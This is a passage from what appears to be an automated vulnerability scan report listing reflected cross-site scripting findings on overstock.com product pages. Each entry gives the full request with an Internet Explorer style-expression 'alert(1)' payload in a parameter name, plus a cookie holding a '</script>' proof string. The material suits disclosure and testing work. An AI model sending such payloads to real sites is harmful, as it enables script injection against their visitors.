Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:49:40 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:49:40 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:49:40 GMT; Path=/
Set-Cookie: mxcproclicks=4737201|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:49:40 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404180208:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=47
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 108513

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Ca
...[SNIP]...
<input type="hidden" name="2c512"style="x:expression(alert(1))"b229728369b" value="1"/>
...[SNIP]...

2.163. http://www.overstock.com/Home-Garden/Camden-Collection-350-Thread-Count-Egyptian-Cotton-Sheet-Sets/4064078/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Camden-Collection-350-Thread-Count-Egyptian-Cotton-Sheet-Sets/4064078/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f623b"style%3d"x%3aexpression(alert(1))"6c555cb7e50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f623b"style="x:expression(alert(1))"6c555cb7e50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Camden-Collection-350-Thread-Count-Egyptian-Cotton-Sheet-Sets/4064078/product.html?f623b"style%3d"x%3aexpression(alert(1))"6c555cb7e50=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:37:59 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:37:59 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:37:59 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4064078|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:37:59 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407079908:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=80
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 124972

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j14.overstock.com ssl:false -->


<head>

<title>Ca
...[SNIP]...
<input type="hidden" name="f623b"style="x:expression(alert(1))"6c555cb7e50" value="1"/>
...[SNIP]...

2.164. http://www.overstock.com/Home-Garden/Capri-Print-300-Thread-Count-Duvet-Set/4805795/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Capri-Print-300-Thread-Count-Duvet-Set/4805795/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc64f"style%3d"x%3aexpression(alert(1))"4fbcfd4b8f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc64f"style="x:expression(alert(1))"4fbcfd4b8f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Capri-Print-300-Thread-Count-Duvet-Set/4805795/product.html?fc64f"style%3d"x%3aexpression(alert(1))"4fbcfd4b8f1=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:48:05 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:48:05 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407685271:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:48:05 GMT; Path=/
Set-Cookie: mxcproclicks=4805795|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:48:05 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113301

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>Ca
...[SNIP]...
<input type="hidden" name="fc64f"style="x:expression(alert(1))"4fbcfd4b8f1" value="1"/>
...[SNIP]...

2.165. http://www.overstock.com/Home-Garden/Casseria-8-piece-Comforter-Set/3672338/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Casseria-8-piece-Comforter-Set/3672338/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83d3e"style%3d"x%3aexpression(alert(1))"fb885b63000 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 83d3e"style="x:expression(alert(1))"fb885b63000 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Casseria-8-piece-Comforter-Set/3672338/product.html?83d3e"style%3d"x%3aexpression(alert(1))"fb885b63000=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:41:27 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:41:27 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=3672338|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:41:27 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407287892:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:41:27 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=29
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 114539

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Ca
...[SNIP]...
<input type="hidden" name="83d3e"style="x:expression(alert(1))"fb885b63000" value="1"/>
...[SNIP]...

2.166. http://www.overstock.com/Home-Garden/Chai-Microsuede-Sofa-Bed/1907674/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Chai-Microsuede-Sofa-Bed/1907674/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c63a"style%3d"x%3aexpression(alert(1))"1cfd780e890 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3c63a"style="x:expression(alert(1))"1cfd780e890 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC demonstrated here uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Chai-Microsuede-Sofa-Bed/1907674/product.html?3c63a"style%3d"x%3aexpression(alert(1))"1cfd780e890=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:21:10 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:21:10 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:21:10 GMT; Path=/
Set-Cookie: mxcproclicks=1907674|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:21:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406070705:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=26
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 108990

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Ch
...[SNIP]...
<input type="hidden" name="3c63a"style="x:expression(alert(1))"1cfd780e890" value="1"/>
...[SNIP]...

2.167. http://www.overstock.com/Home-Garden/Chrome-3-light-Black-Shade-Crystal-Chandelier/4488456/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Chrome-3-light-Black-Shade-Crystal-Chandelier/4488456/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66523"style%3d"x%3aexpression(alert(1))"edf649f61ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66523"style="x:expression(alert(1))"edf649f61ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC demonstrated here uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Chrome-3-light-Black-Shade-Crystal-Chandelier/4488456/product.html?66523"style%3d"x%3aexpression(alert(1))"edf649f61ee=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:29:13 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:29:13 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4488456|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:29:13 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406553445:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:29:13 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=48
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113205

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>Ch
...[SNIP]...
<input type="hidden" name="66523"style="x:expression(alert(1))"edf649f61ee" value="1"/>
...[SNIP]...

2.168. http://www.overstock.com/Home-Garden/Chrome-Five-function-Personal-Handheld-Shower-Head/2073900/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Chrome-Five-function-Personal-Handheld-Shower-Head/2073900/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a84ed"style%3d"x%3aexpression(alert(1))"6d161d83ee7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a84ed"style="x:expression(alert(1))"6d161d83ee7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC demonstrated here uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Chrome-Five-function-Personal-Handheld-Shower-Head/2073900/product.html?a84ed"style%3d"x%3aexpression(alert(1))"6d161d83ee7=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:35:18 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:35:18 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:35:18 GMT; Path=/
Set-Cookie: mxcproclicks=2073900|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:35:18 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406918921:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=28
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 109428

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Ch
...[SNIP]...
<input type="hidden" name="a84ed"style="x:expression(alert(1))"6d161d83ee7" value="1"/>
...[SNIP]...

2.169. http://www.overstock.com/Home-Garden/Chrome-Widespread-Bathroom-Faucet/1893704/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Chrome-Widespread-Bathroom-Faucet/1893704/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8128"style%3d"x%3aexpression(alert(1))"78e6724e003 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c8128"style="x:expression(alert(1))"78e6724e003 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC demonstrated here uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Chrome-Widespread-Bathroom-Faucet/1893704/product.html?c8128"style%3d"x%3aexpression(alert(1))"78e6724e003=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:35:18 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:35:19 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=1893704|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:35:19 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406918965:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:35:19 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
